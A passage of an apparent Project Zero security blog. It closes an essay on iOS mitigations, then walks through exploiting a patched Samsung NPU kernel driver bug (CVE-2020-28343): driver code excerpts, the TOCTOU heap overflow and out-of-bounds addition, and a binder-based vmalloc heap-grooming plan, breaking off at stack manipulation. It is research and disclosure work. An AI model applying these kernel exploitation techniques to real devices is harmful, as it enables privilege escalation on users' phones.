The implementation compromises on the software side which will be required to ship memory tagging will be different to those required for Pointer Authentication, but they will be there. Many mitigations built with MTE will be probabilistic in nature; will that be enough? And what about all the code constructs which might lead to bypasses? Nobody is going to check and rewrite every raw pointer cast in their codebase. Will the team responsible for performance accept the overhead of requiring every freed allocation to be zeroed? What about all the custom allocators? What about shared memory? What about intra-struct buffer overflows (like this AWDL vulnerability)? What about javascript? What about logic bugs and speculative side channels?


We know nothing about what primitives Apple might build with memory tagging, but we do have some insight from Microsoft, who published a detailed analysis of the tradeoffs they are facing with their implementation. Sharing such information with the security community helps enormously in understanding those tradeoffs. Memory tagging will probably make some vulnerabilities unexploitable, just like Pointer Authentication probably did. But to quantify the true impact requires an estimate of the impact it has on the entire space of vulnerabilities, and it's in this estimate where the defensive and offensive communities differ. As things currently stand, there are probably just too many good vulnerabilities for any of these mitigations to pose much of a challenge to a motivated attacker. And, of course, mitigations only present in future hardware don't benefit the billions of devices already shipped and currently in use.


These mitigations do move the bar, but what do I think it would take to truly raise it?


Firstly, a long-term strategy and plan for how to modernize the enormous amount of critical legacy code that forms the core of iOS. Yes, I'm looking at you vm_map.c, originally written in 1985 and still in use today! Let's not forget that PAC is still not available to third-party apps so memory corruption in a third party messaging app followed by a vm_map logic bug is still going to get an attacker everything they want for probably years after MTE first ships.


Secondly, a short-term strategy for how to improve the quality of new code being added at an ever-increasing rate. This comes down to more investment in modern best practices like broad, automated testing, code review for critical, security sensitive code and high-quality internal documentation so developers can understand where their code fits in the overall security model. 


Thirdly, a renewed focus on vulnerability discovery using more than just fuzzing. This means not just more variant analysis, but a large, dedicated effort to understand how attackers really work and beat them at their own game by doing what they do better.


An iOS hacker tries Android

Written by Brandon Azad, when working at Project Zero

One of the amazing aspects of working at Project Zero is having the flexibility to direct my own research agenda. My prior work has almost exclusively focused on iOS exploitation, but back in August, I thought it could be interesting to try writing a kernel exploit for Android to see how it compares. I have two aims for this blog post: First, I will walk you through my full journey from bug description to kernel read/write/execute on the Samsung Galaxy S10, starting from the perspective of a pure-iOS security researcher. Second, I will try to emphasize some of the major security/exploitation differences between the two platforms that I have observed.

You can find the fully-commented exploit code attached in issue 2073.

In November 2020, Samsung released a patch addressing the issue for devices that are eligible for receiving security updates. This issue was assigned CVE-2020-28343 and a Samsung-specific SVE-2020-18610.

The initial vulnerability report

In early August, fellow Google Project Zero researcher Ben Hawkes reported several vulnerabilities in the Samsung Neural Processing Unit (NPU) kernel driver due to a complete lack of input sanitization. At a high level, the NPU is a coprocessor dedicated to machine learning and neural network computations, especially for visual processing. The bugs Ben found were in Samsug's Android kernel driver for the NPU, responsible (among other things) for sending neural models from an Android app in userspace over to the NPU coprocessor.

The following few sections will look at the vulnerabilities. These bugs aren't actually that interesting: they are quite ordinary out-of-bounds writes due to unsanitized input, and could almost be treated as black-box primitives for the purposes of writing an exploit (which was my ultimate goal). The primitives are quite strong and, to my knowledge, no novel techniques are required to build a practical exploit out of them in practice. However, since I was coming from the perspective of never having written a Linux kernel exploit, understanding these bugs and their constraints in detail was crucial for me to begin to visualize how they might be used to gain kernel read/write.

🤖 📱 🧠 👓 🐛🐛

The vulnerabilities are reached by opening a handle to the device /dev/vertex10, which Ben had determined is accessible to a normal Android app. Calling open() on this device causes the kernel to allocate and initialize a new npu_session object that gets associated with the returned file descriptor. The process can then invoke ioctl() on the file descriptor to interact with the session. For example, consider the following code:

int ncp_fd = open("/dev/vertex10", O_RDONLY);

struct vs4l_graph vs4l_graph = /* ioctl data */;

ioctl(ncp_fd, VS4L_VERTEXIOC_S_GRAPH, &vs4l_graph);

The preceding syscalls will result in the kernel calling the function npu_vertex_s_graph(), which calls npu_session_s_graph() on the associated npu_session (see drivers/vision/npu/npu-vertex.c). npu_session_s_graph() then calls __config_session_info() to parse the input data to this ioctl (see npu-session.c):

int __config_session_info(struct npu_session *session)

{

...

    ret = __pilot_parsing_ncp(session, &temp_IFM_cnt, &temp_OFM_cnt, &temp_IMB_cnt, &WGT_cnt);

    temp_IFM_av = kcalloc(temp_IFM_cnt, sizeof(struct temp_av), GFP_KERNEL);

    temp_OFM_av = kcalloc(temp_OFM_cnt, sizeof(struct temp_av), GFP_KERNEL);

    temp_IMB_av = kcalloc(temp_IMB_cnt, sizeof(struct temp_av), GFP_KERNEL);

...

    ret = __second_parsing_ncp(session, &temp_IFM_av, &temp_OFM_av, &temp_IMB_av, &WGT_av);

...

}

As can be seen above, __config_session_info() calls two other functions to perform the actual parsing of the input: __pilot_parsing_ncp() and __second_parsing_ncp(). As their names suggest, __pilot_parsing_ncp() performs a preliminary "pilot" parsing of the input data in order to compute the sizes of a few arrays that will need to be allocated for the full parsing; meanwhile, __second_parsing_ncp() performs the full parsing, populating the arrays that were just allocated.

Let's take a quick look at __pilot_parsing_ncp():

int __pilot_parsing_ncp(struct npu_session *session, u32 *IFM_cnt, u32 *OFM_cnt, u32 *IMB_cnt, u32 *WGT_cnt)

{

...

    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;

    ncp = (struct ncp_header *)ncp_vaddr;

    memory_vector_offset = ncp->memory_vector_offset;

    memory_vector_cnt = ncp->memory_vector_cnt;

    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);

    for (i = 0; i < memory_vector_cnt; i++) {

        u32 memory_type = (mv + i)->type;

        switch (memory_type) {

        case MEMORY_TYPE_IN_FMAP:

            {

                (*IFM_cnt)++;

                break;

            }

        case MEMORY_TYPE_OT_FMAP:

            {

                (*OFM_cnt)++;

                break;

            }

...

        }

    }

    return ret;

}

There are a few things to note here.

First, the input data is being parsed from a buffer pointed to by the field session->ncp_mem_buf->vaddr. This turns out to be an ION buffer, which is a type of memory buffer shareable between userspace, the kernel, and coprocessors. The ION interface was introduced by Google into the Android kernel to facilitate allocating device-accessible memory and sharing that memory with various hardware components, all without needing to copy the data between buffers. In this case, the userspace app will initialize the model directly inside an ION buffer, and then the model will be mapped directly into the kernel for pre-processing before the ION buffer's device address is sent to the NPU to perform the actual work.

The important takeaway from this first observation is that the session->ncp_mem_buf->vaddr field points to an ION buffer that is currently mapped into both userspace and the kernel: that is, it's shared memory.

The second thing to note in the function __pilot_parsing_ncp() is that the only thing it does is count the number of times each type of element appears in the memory_vector array in the shared ION buffer. Each memory_vector element has an associated type, and this function simply tallies up the number of times it sees each type, and nothing else. There isn't even a failure case for this function.

This is interesting for a few reasons. For one, there's no input sanitization to ensure that memory_vector_cnt (which is read directly from the shared memory buffer and thus is attacker-controlled) is a sane value. It could be 0xffffffff, leading the for loop to process memory_vector elements off the end of the ION buffer. Probably a kernel crash at worst, but it's certainly an indication of unfuzzed code.

More importantly, since only the count of each type is stored, it seems likely that this code is setting itself up for a double-read, time-of-check-to-time-of-use (TOCTOU) issue when it later processes the memory_vectors a second time. Each of the returned counts is used to allocate an array in kernel memory (see __config_session_info()). But because the memory_vector_cnt and types reside in shared memory, they could be changed by code running in userspace between __pilot_parsing_ncp() and __second_parsing_ncp(), meaning that the second function is passed incorrectly sized arrays for the memory_vector data it eventually sees in the shared buffer.

Of course, to determine whether this is actually a bug, we have to look at the implementation of __second_parsing_ncp():

int __second_parsing_ncp(

    struct npu_session *session,

    struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,

    struct temp_av **temp_IMB_av, struct addr_info **WGT_av)

{

    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;

    ncp_daddr = session->ncp_mem_buf->daddr;

    ncp = (struct ncp_header *)ncp_vaddr;

    address_vector_offset = ncp->address_vector_offset;

    address_vector_cnt = ncp->address_vector_cnt;

...

    memory_vector_offset = ncp->memory_vector_offset;

    memory_vector_cnt = ncp->memory_vector_cnt;

    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);

    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

...

    for (i = 0; i < memory_vector_cnt; i++) {

        u32 memory_type = (mv + i)->type;

        u32 address_vector_index;

        u32 weight_offset;

        switch (memory_type) {

        case MEMORY_TYPE_IN_FMAP:

          {

            address_vector_index = (mv + i)->address_vector_index;

            if (!EVER_FIND_FM(IFM_cnt, *temp_IFM_av, address_vector_index)) {

                (*temp_IFM_av + (*IFM_cnt))->index = address_vector_index;

                (*temp_IFM_av + (*IFM_cnt))->size = (av + address_vector_index)->size;

                (*temp_IFM_av + (*IFM_cnt))->pixel_format = (mv + i)->pixel_format;

                (*temp_IFM_av + (*IFM_cnt))->width = (mv + i)->width;

                (*temp_IFM_av + (*IFM_cnt))->height = (mv + i)->height;

                (*temp_IFM_av + (*IFM_cnt))->channels = (mv + i)->channels;

                (mv + i)->stride = 0;

                (*temp_IFM_av + (*IFM_cnt))->stride = (mv + i)->stride;

...

                (*IFM_cnt)++;

            }

            break;

          }

...

        case MEMORY_TYPE_WEIGHT:

          {

            // update address vector, m_addr with ncp_alloc_daddr + offset

            address_vector_index = (mv + i)->address_vector_index;

            weight_offset = (av + address_vector_index)->m_addr;

            if (weight_offset > (u32)session->ncp_mem_buf->size) {

                ret = -EINVAL;

                npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",

                    session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);

                goto p_err;

            }

            (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;

...

            (*WGT_cnt)++;

            break;

          }

...

        }

    }

...

}

Once again, there are several things to note here.

First off, it does indeed turn out that memory_vector_cnt is read a second time from the shared ION buffer, and there are no sanity checks to ensure that the arrays temp_IFM_av, temp_OFM_av, and temp_IMB_av are not filled beyond the counts for which they were each allocated. So this is indeed a linear heap overflow bug.

But secondly, when processing a memory_vector element of type MEMORY_TYPE_WEIGHT, it appears that there's another issue as well: A controlled 32-bit value address_vector_index is read from the memory_vector entry and used as an index into an address_vector array without any bounds checks. And not only is the out-of-bounds address_vector's m_addr field read, it's also written a few lines later after adding in the ION buffer's device address! So this is an out-of-bounds addition at a controlled offset.

These are the two most serious issues described in Ben's report to Samsung. We'll look at each in more detail in the following two sections in order to understand their constraints.

The heap overflow

How might the heap overflow be triggered?

First, __config_session_info() will call __pilot_parsing_ncp() to count the number of elements of each type in the memory_vector array in the shared ION buffer. Imagine that initially the value of ncp->memory_vector_cnt is 1, and the single memory_vector has type MEMORY_TYPE_IN_FMAP. Then __pilot_parsing_ncp() will return with IFM_cnt set to 1.

Next, __config_session_info() will allocate the temp_IFM_av with space for a single temp_av element.

Concurrently, a thread in userspace will race to change the value of ncp->memory_vector_cnt in the shared ION buffer from 1 to 100. The memory_vector now appears to have 100 elements, and userspace will ensure that the extra elements all have type MEMORY_TYPE_IN_FMAP as well.

Back in the kernel: After allocating the arrays, __config_session_info() will call __second_parsing_ncp() to perform the second stage of parsing. __second_parsing_ncp() will read memory_vector_cnt again, this time getting the value 100. Thus, in the for loop, it will try to process 100 elements from the memory_vector array, and each will be of type MEMORY_TYPE_IN_FMAP. Each iteration will populate another temp_av element in the temp_IFM_av array, and elements after the first will be written off the end of the array.

Furthermore, the out-of-bounds temp_av element's fields are written with contents read from the ION buffer, which means that the contents of the out-of-bounds write can be fully controlled (except for padding between fields).

This seems like an excellent primitive: we're performing an out-of-bounds write off the end of a kernel allocation of controlled size, and we can control both the size of the overflow and the contents of the data we write. This level of control means that it should theoretically be possible to place the temp_IFM_av allocation next to many different types of objects and control the amount of the victim object we overflow. Having such flexibility means that we can choose from a very wide selection of victim objects when deciding the easiest and most reliable exploit strategy.

The one thing to be aware of is that a simple implementation would probably win the race to increase memory_vector_cnt about 25% of the time. The reason for this is that it's probably tricky to get the timing of when to flip from 1 to 100 exactly right, so the simplest strategy is simply to have a user thread alternate between the two values continuously. If each of the reads in __pilot_parsing_ncp() and __second_parsing_ncp() reads either 1 or 100 randomly, then there's a 1 in 4 chance that the first read is 1 and the second is 100. The good thing is that nothing too bad happens if we lose the race: there's possibly a memory leak, but the kernel doesn't crash. Thus, we can just try this over and over until we win.

The out-of-bounds addition

Now that we've seen the heap overflow, let's look at the out-of-bounds addition primitive. Unlike the prior primitive, this one is a straightforward, deterministic out-of-bounds addition.

Once again, we'll initialize our ION buffer to have a single memory_vector element, but this time its type will be MEMORY_TYPE_WEIGHT. Nothing interesting happens in __pilot_parsing_ncp(), so we'll jump ahead to __second_parsing_ncp().

In __second_parsing_ncp(), address_vector_offset is read directly from the ION buffer without input validation. This is added to the ION buffer address to compute the address of an array of address_vector structs; since the offset was unchecked, this supposed address_vector array could lie entirely in out-of-bounds memory. And importantly, there are no alignment checks, so the address_vector array could start at any odd unaligned address we want.

    address_vector_offset = ncp->address_vector_offset;

...

    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

We next enter the for loop to process the single memory_vector entry, and jump to the case for MEMORY_TYPE_WEIGHT. This code reads the address_vector_index field of the memory_vector, which is again completely controlled and unvalidated. The (potentially out-of-bounds) address_vector element at the specified index is then accessed.

    // update address vector, m_addr with ncp_alloc_daddr + offset

    address_vector_index = (mv + i)->address_vector_index;

    weight_offset = (av + address_vector_index)->m_addr;

Reading the m_addr field (at offset 0x4 in address_vector) will thus possibly perform an out-of-bounds read.

But there's a check we need to pass before we can hit the out-of-bounds write:

    if (weight_offset > (u32)session->ncp_mem_buf->size) {

        ret = -EINVAL;

        npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",

            session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);

        goto p_err;

    }

Basically, what this does is compare the original value of the out-of-bounds read to the size of the ION buffer, and if the original value is greater than the ION buffer size, then __second_parsing_ncp() aborts without performing the write.

But, assuming that the original value is less than the ION buffer size, it gets updated by adding in the device address (daddr) of the ION buffer:

    (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;

The device address is (presumably) the address at which a device could access the buffer; this could be a physical address, or if the system has an IOMMU in front of the hardware device performing the access, it would be an IOMMU-translated address. Essentially, this code expects that the m_addr field in the address_vector will initially be an offset from the start of the ION buffer, and it updates it into an absolute (device) address by adding the ION buffer's daddr.

So, if the original value at the out-of-bounds addition location is quite small, and in particular smaller than the ION buffer size, then this primitive will allow us to add in the ION buffer's daddr, making the value rather large instead.

"Hey Siri, how do I exploit Android?"

Everything described up to here comes more or less directly from Ben's initial report to Samsung. So: what now?

Even after reading Ben's initial report and looking at the NPU driver's source code to understand the bugs more fully, I felt rather lost as to how to proceed. As the title and intro to this post suggest, Android is not my area.

On the other hand, I have written a few iOS kernel exploits for memory corruption bugs before. Based on that experience, I suspected that both the heap overflow and the out-of-bounds addition could be exploited using straightforward applications of existing techniques, had the bugs existed on iOS. So I embarked on a thought experiment: what would the full exploit flows for each of these primitives be if the bugs existed on iOS instead of Android? My hope was that I might be able to draw parallels between the two, such that thinking about the exploit on iOS would inform how these bugs could be exploited on Android.

Thought experiment: an iOS heap overflow

So, imagine that an equivalent to the heap overflow bug existed on iOS; that is, imagine there were a race with a 25% win rate that allowed us to perform a fully controlled linear heap buffer overflow out of a controlled-size allocation. How could we turn this into arbitrary kernel read/write?

On iOS, the de-facto standard for a final kernel read/write capability has been the use of an object called a kernel task port. A task port is a handle that gives us control over the virtual memory of a task, and a kernel task port is a task port for the kernel itself. Thus, if you can construct a kernel task port, you can use standard APIs like mach_vm_read() and mach_vm_write() to read and write kernel memory from userspace.

Comparing this heap overflow to the vulnerabilities listed in the survey, the initial primitive is most similar to that granted by CVE-2017-2370, which was exploited by extra_recipe and Yalu102. Thus, the exploit flow would likely be quite similar to those existing iOS exploits. And to make our thought experiment even easier, we can put aside any concern about reliability and just imagine the simplest exploit flow that could work generically.

The most straightforward way to get a handle to a kernel task port using this primitive would likely be to overflow into an out-of-line Mach ports array and insert a pointer to a fake kernel task port, such that receiving the overflowed port array back in userspace grants us a handle to our fake port. This is essentially the strategy used by Yalu102, except that that exploit relies on the absence of PAN (i.e., it relies on being able to dereference userspace pointers from kernel mode). The same strategy should work on systems with PAN, it would just require a few extra steps.

Unfortunately, the first time we trigger the vulnerability to give ourselves a handle to a fake task port, we won't have all the information needed to immediately construct a kernel task port: we'd need to leak the addresses of a few important kernel objects, such as the kernel_map, first. Consequently, we would need to start first by giving ourselves a "vanilla" fake task port and then use that to read arbitrary kernel memory via the traditional pid_for_task() technique. Once we can read kernel memory, we would locate the relevant kernel objects to build the final kernel task port.

Now, since we'll need to perform multiple arbitrary reads using pid_for_task(), we need to be able to update the kernel address we want to read from. This can be a challenge because the pointer specifying the target read address lives in kernel memory. Fortunately, there already exist a few standard techniques for updating this pointer to read from new kernel addresses, such as reallocating the buffer holding the target read pointer (see the Chaos exploit), overlapping Mach ports in special ways that allow updating the target read address directly (see the v0rtex exploit), or placing the fake kernel objects in user/kernel shared memory (see the oob_timestamp exploit).

Finally, there will also be some complications from working around Apple's zone_require mitigation, which aims to block exactly these types of fake Mach port shenanigans. However, at least through iOS 13.3, it's possible to get around zone_require by operating with large allocations that live outside the zone_map (see the oob_timestamp exploit).

So, in summary, a very simplistic exploit flow for the heap overflow might look something like this:

  1. Spray large amounts of kernel memory with fake task ports and fake tasks, such that you can be reasonably sure that one fake object of each type has been sprayed to a specific hardcoded address. Use the oob_timestamp trick to bypass zone_require and place these fake objects in shared memory.
  2. Spray out-of-line Mach ports allocations, and poke holes between the allocations.
  3. Trigger the out-of-bounds write out of an allocation of the same size as the out-of-line Mach ports allocations, overflowing into the subsequent array of Mach ports and inserting the hardcoded pointer to the fake ports.
  4. Receive the out-of-line Mach port handles in userspace and check if there's a new task port handle; if not, go back to step 2.
  5. This handle is a fake task port that can be used to read kernel memory using pid_for_task(). Use this capability to find relevant kernel objects and update the fake task into a fake kernel task object.

Thought experiment: an iOS out-of-bounds addition

What about the out-of-bounds addition?

None of the bugs in the survey of iOS kernel exploits seem like a good comparison point: the most similar category would be linear heap buffer overflows, but these are much more limiting due to spatial locality. Nonetheless, I eventually settled on oob_timestamp as the best reference.

The vulnerability used by oob_timestamp is CVE-2020-3837, a linear heap out-of-bounds write of up to 8 bytes of timestamp data. However, this isn't the typical heap buffer overflow. Most heap overflows occur in small to medium sized allocations of up to 2 pages (0x8000 bytes); these allocations occur in a submap of the kernel virtual address space called the zone_map. Meanwhile, the out-of-bounds write in oob_timestamp occurs off the end of a pageable region of shared memory outside the zone_map, in the general kernel_map used for large, multi-page allocations or allocations with special properties (like pageable and shared memory).

The basic flow of oob_timestamp is as follows:

  1. Groom the kernel_map to allocate the pageable shared memory region, an ipc_kmsg, and an out-of-line Mach ports array contiguously. These are followed by a large number of filler allocations.
  2. Trigger the overflow to overwrite the first few bytes of the ipc_kmsg, increasing the size field.
  3. Free the ipc_kmsg, causing the subsequent out-of-line Mach ports array to also be freed.
  4. Reallocate the out-of-line Mach ports array with controlled data, effectively inserting fake Mach port pointers into the array. The pointer will be a pointer to a fake task port in the pageable shared memory region.
  5. Receive the out-of-line Mach ports in userspace, gaining a handle to the fake port.
  6. Overwrite the fake port in shared memory to make a fake task port and then read kernel memory using pid_for_task(). Find relevant kernel objects and update the fake task into a fake kernel task.

My thought was that you could basically use the out-of-bounds addition primitive as a drop-in replacement for the out-of-bounds timestamp write primitive in oob_timestamp. This seemed sensible because the initial primitive in oob_timestamp is only used to increase the size of an ipc_kmsg so that extra memory gets freed. Since all I need to do is bump an ipc_kmsg's size field, I felt that an out-of-bounds addition primitive should surely be suitable for this.

As it turns out, the constraints of the out-of-bounds addition are actually much tighter than I had imagined: the ipc_kmsg's size and the ION buffer's device address would need to be very carefully chosen to meet all the requirements. In spite of this oversight, oob_timestamp still proved a useful reference point for another reason: where the ION buffers get mapped in kernel memory.

Like iOS, Android also has multiple areas of virtual memory in which allocations can be made. kmalloc() is the standard allocation function used for most allocations. It's somewhat analogous to allocating using kalloc() on iOS: allocations can be less than a page in size and are managed via a dedicated allocation pool that's a bit like the zone_map. However, there's also a vmalloc() function for allocating "virtually contiguous memory". Unlike kmalloc(), vmalloc() allocates at page granularity and allocations occur in a separate region of kernel virtual memory somewhat analogous to the kernel_map on iOS.

The reason this matters is that the ION buffer on Android is mapped into the Linux kernel's vmalloc region. Thus, the fact that the out-of-bounds addition occurs off the end of a shared ION buffer mapped in the vmalloc area closely parallels how the oob_timestamp overflow occurs off the end of a pageable shared memory region in the kernel_map.

Choosing a path

At this point I still faced many unknowns: What allocation and heap shaping primitives were available on Android? What types of objects would be useful to corrupt? What would be Android's equivalent of the kernel task port, the final read/write capability? I had no idea.

One thing I did have was a hint at a good starting point: Both Ben and fellow Project Zero researcher Jann Horn had pointed out that along with the ION buffers, kernel thread stacks were also allocated in the vmalloc area, which meant that kernel stacks might be a good target for the out-of-bounds addition bug.

A diagram showing an ION buffer mapped directly before a userspace thread's kernel stack, with a guard page in between. The address_vector_offset is so large that it points past the end of the ION buffer and into the stack.

If the ION buffer is mapped directly before a kernel stack for a userspace thread, then the out-of-bounds addition primitive could be used to manipulate the stack.

Imagine that we could get a kernel stack for a thread in our process allocated at a fixed offset after the ION buffer. The out-of-bounds addition primitive would let us manipulate values on the thread's stack during a syscall by adding in the ION buffer's daddr, assuming that the initial values were sufficiently small. For example, we might make a blocking syscall which saves a certain size parameter in a variable, and once that syscall blocks and spills the size variable to the stack, we can use the out-of-bounds addition to make it very large; unblocking the syscall would then cause the original code to resume use the corrupted size value, perhaps passing it to a function like memcpy() to cause further memory corruption.

Using the out-of-bounds addition primitive to target values on a thread's kernel stack was appealing for one very important reason: in theory, this technique could dramatically reduce the amount of Linux-specific knowledge I'd need to develop a full exploit.

Most typical memory corruption exploits require finding specific objects that are interesting targets for corruption. For example, there are very few objects that could replace the ipc_kmsg in the oob_timestamp exploit, because the exploit relies on corrupting a size field stored at the very start of the struct; not many other objects have a size as their first field. So ipc_kmsg fills a very important niche in the arsenal of interesting objects to target with memory corruption, just as Mach ports fill a niche in useful objects to get a fake handle for.

Undoubtedly, there's a similar arsenal of useful objects to target for Android kernel exploitation. But by limiting ourselves to corrupting values on the kernel stack, we transform the set of all useful target "objects" into the set of useful stack frames to manipulate. This is a much easier set of target objects to work with than the set of all structs that could be allocated after the ION buffer because it doesn't require much Linux-specific knowledge to reason about semantics: We only need to identify relevant syscalls and look at the kernel binary in a disassembler to get a handle on what "objects" we have available to us.

Selecting the out-of-bounds addition primitive and choosing to target kernel thread stacks effectively solves the problem of finding useful kernel objects to corrupt by turning what would be a codebase-wide search into a simple enumeration of interesting stack frames in a disassembler without needing to learn much in the way of Linux internals.

Nevertheless, we are still left with two pressing questions: What allocation and heap shaping primitives do we have on Android? And what will be our final read/write capability to parallel the kernel task port?

Heap shaping

I started with the heap shaping primitive since it seemed the more tangible problem.

As previously mentioned, the vmalloc area is a region of the kernel's virtual address space in which allocations and mappings of page-level granularity can be made, comparable to the kernel_map on iOS. And just like how iOS provides a means of inspecting virtual memory regions in the kernel_map via vmmap, Linux provides a way of inspecting the allocations in the vmalloc area through /proc/vmallocinfo.

The /proc/vmallocinfo interface provides a simple textual description of each allocated virtual memory region inside the vmalloc area, including the start and end addresses, the size of the region in bytes, and some information about the allocation, such as the allocation site:

0xffffff8013bd0000-0xffffff8013bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8013bd8000-0xffffff8013bdd000   20480 unpurged vm_area

0xffffff8013be0000-0xffffff8013be5000   20480 unpurged vm_area

0xffffff8013be8000-0xffffff8013bed000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8013bed000-0xffffff8013cec000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc

0xffffff8013cec000-0xffffff8013eed000 2101248 ion_heap_map_kernel+0x110/0x16c vmap

0xffffff8013eed000-0xffffff8013fee000 1052672 ion_heap_map_kernel+0x110/0x16c vmap

0xffffff8013ff0000-0xffffff8013ff5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8013ff8000-0xffffff8013ffd000   20480 unpurged vm_area

0xffffff8014000000-0xffffff80140ff000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc

0xffffff8014108000-0xffffff801410d000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

This gives us a way to visualize the vmalloc area and ensure that our allocations are grooming the heap as we want them to.

Our heap shaping needs to place a kernel thread stack at a fixed offset after the ION buffer mapping. By inspecting the kernel source code and the vmallocinfo output, I determined that kernel stacks consisted of 4 pages (0x4000 bytes) of data but also included a guard page after the allocation that was included in the size. Thus, my initial heap shaping idea was:

  1. Allocate large allocation of say 0x80000 bytes.
  2. Spray kernel stacks by creating new threads to fill up all 0x5000-byte holes in the vmalloc area before our large 0x80000-byte allocation.
  3. Free the large allocation. This should make an 0x80000-byte hole with no 0x5000-byte holes before it.
  4. Spray several more kernel stacks by creating new threads; these stacks should fall into the beginning of the hole, and also fill any earlier holes created by exiting threads from other processes.
  5. Map the ION buffer into the kernel by invoking the VS4L_VERTEXIOC_S_GRAPH ioctl, but without triggering the out-of-bounds addition. The ION buffer mapping should also fall into the hole.
  6. Spray more kernel stacks by creating new threads. These should fall into the hole as well, and one of them should land directly after the ION buffer.

Unfortunately, when I proposed this strategy to my teammates, Jann Horn pointed out a problem. In XNU, when you free a kernel_map allocation, that virtual memory region becomes immediately available for reuse. However, in Linux, freeing a vmalloc allocation usually just marks the allocation as freed without allowing you to immediately reclaim the virtual memory range; instead, the range becomes an "unpurged vm_area", and these areas are only properly freed and reclaimed once the amount of unpurged vm_area memory crosses a certain threshold. The reason Linux batches reclaiming freed virtual memory regions like this is to minimize the number of expensive global TLB flushes.

Consequently, this approach doesn't work exactly as we'd like: it's hard to know precisely when the unpurged vm_area allocations will be purged, so we can't be sure that we're reclaiming the hole to arrange our allocations. Nevertheless, it is possible to force a vm_area purge if you allocate and free enough memory. We just can't rely on the exact timing.

Even though the straightforward approach wouldn't work, Ben and Jann did help me identify a useful allocation site for spraying controlled-size allocations using vmalloc(). The function binder_alloc_mmap_handler(), which implements mmap() called on /dev/binder file descriptors, contains a call to get_vm_area() on the specific kernel version I was exploiting. Thus, the following sequence of operations would allow me to perform a vmalloc() of any size up to 4 MiB:

int binder_fd = open("/dev/binder", O_RDONLY);

void *binder_map = mmap(NULL, vmalloc_size,

        PROT_READ, MAP_PRIVATE, binder_fd, 0);

The main annoyance with this approach is that only a single allocation can be made using each binder fd; to make multiple allocations, you need to open multiple fds.

On my rooted Samsung Galaxy S10 test device, it appeared that the vmalloc area contained a lot of unreserved space at the end, in particular between 0xffffff8050000000 and 0xffffff80f0000000:

0xffffff804a400000-0xffffff804a800000 4194304 vm_map_ram

0xffffff804a800000-0xffffff804ac00000 4194304 vm_map_ram

0xffffff804ac00000-0xffffff804b000000 4194304 vm_map_ram

0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000

0xffffff80fafe0000-0xffffff80fede1000 65015808

0xffffff80fefe0000-0xffffff80ff5e1000 6295552

0xffffff8100d00000-0xffffff8100d3a000  237568 phys=0x0000000095000000

0xffffffbebfdc8000-0xffffffbebfe80000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

0xffffffbebfe80000-0xffffffbebff38000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

0xffffffbebff38000-0xffffffbebfff0000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

Thus, I came up with an alternative strategy to place a kernel thread stack after the ION buffer mapping:

  1. Open a large number of /dev/binder fds.
  2. Spray a large amount of vmalloc memory using the binder fds and then close them, forcing a vm_area purge. We can't be sure of exactly when this purge occurs, so some unpurged vm_area regions will still be left. But forcing a purge will expose any holes at the start of the vmalloc area so that we can fill them in the next step. This prevents these holes from opening up at a later stage, messing up the groom.
  3. Now spray many allocations to the binder fds in decreasing sizes: 4 MiB, 2 MiB, 1 MiB, etc., all the way down to 0x4000 bytes. The idea is to efficiently fill holes in the vmalloc heap so that we eventually start allocating from clean virtual address space, like the 0xffffff8050000000 region identified earlier. The first binder vmallocs will fill the large holes, then later allocs will fill smaller and smaller holes, until eventually all 0x5000-byte holes are filled. (It is 0x5000 not 0x4000 because the allocations have a guard page at the end.)
  4. Now create some user threads. The threads' kernel stacks will allocate their 0x4000-byte stacks (which are 0x5000-byte reservations with the guard page) from the fresh virtual memory area at the end of the vmalloc region.
  5. Now trigger the vulnerable ioctl to map the ION buffer into the vmalloc region. If the ION buffer is chosen to have size 0x4000 bytes, it will also be placed in the fresh virtual memory area at the end of the vmalloc region.
  6. Finally, create some more user threads. Once again, their kernel stacks will be allocated from the fresh VA space, and they will thus be placed directly after the ION buffer, achieving our goal.

This technique actually seemed to work reasonably well. By dumping /proc/vmallocinfo at each step, it's possible to check that the kernel heap is being laid out as we hope. And indeed, it did appear that we were getting the ION buffer allocated directly before kernel thread stacks:

0xffffff8083ba0000-0xffffff8083ba5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083ba8000-0xffffff8083bad000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bad000-0xffffff8083bb2000   20480 ion_heap_map_kernel+0x110/0x16c vmap

0xffffff8083bb8000-0xffffff8083bbd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bc0000-0xffffff8083bc5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bc8000-0xffffff8083bcd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bd0000-0xffffff8083bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000

0xffffff80fafe0000-0xffffff80fede1000 65015808

0xffffff80fefe0000-0xffffff80ff5e1000 6295552

Stack manipulation

At this point we can groom the kernel heap to place the kernel stack for one of our process's threads directly after the ION buffer, giving us the ability to manipulate the thread's stack while it is blocked in a syscall. The next question is what we should manipulate?

